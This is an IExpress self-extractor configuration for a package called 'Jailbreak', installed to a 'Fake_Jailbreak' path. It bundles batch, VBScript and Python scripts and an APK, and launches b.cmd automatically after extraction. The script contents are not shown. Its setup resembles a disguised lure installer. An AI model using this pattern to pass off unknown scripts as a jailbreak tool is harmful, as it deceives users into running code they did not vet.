[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=1
HideExtractAnimation=1
UseLongFileName=1
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=N
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName=C:\Fake_Jailbreak\JailBreak.exe
FriendlyName=Jailbreak
AppLaunched=cmd /c b.cmd
PostInstallCmd=<None>
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="a.py"
FILE1="b.cmd"
FILE2="cydia.apk"
FILE3="Install_Cydia.cmd"
FILE4="JailBreak.SED"
FILE5="Jailbreak_Lan.cmd"
FILE6="Jailbreak_script.cmd"
FILE7="Jailbreaking.py"
FILE8="Launch_Jailbreak.vbs"
FILE9="Log.bat"
FILE10="RunCydiaInstall.bat"
FILE11="Uninstall.bat"
FILE12="UninstallStarter.bat"
[SourceFiles]
SourceFiles0=C:\JailbreakAndroid\
[SourceFiles0]
%FILE0%=
%FILE1%=
%FILE2%=
%FILE3%=
%FILE4%=
%FILE5%=
%FILE6%=
%FILE7%=
%FILE8%=
%FILE9%=
%FILE10%=
%FILE11%=
%FILE12%=
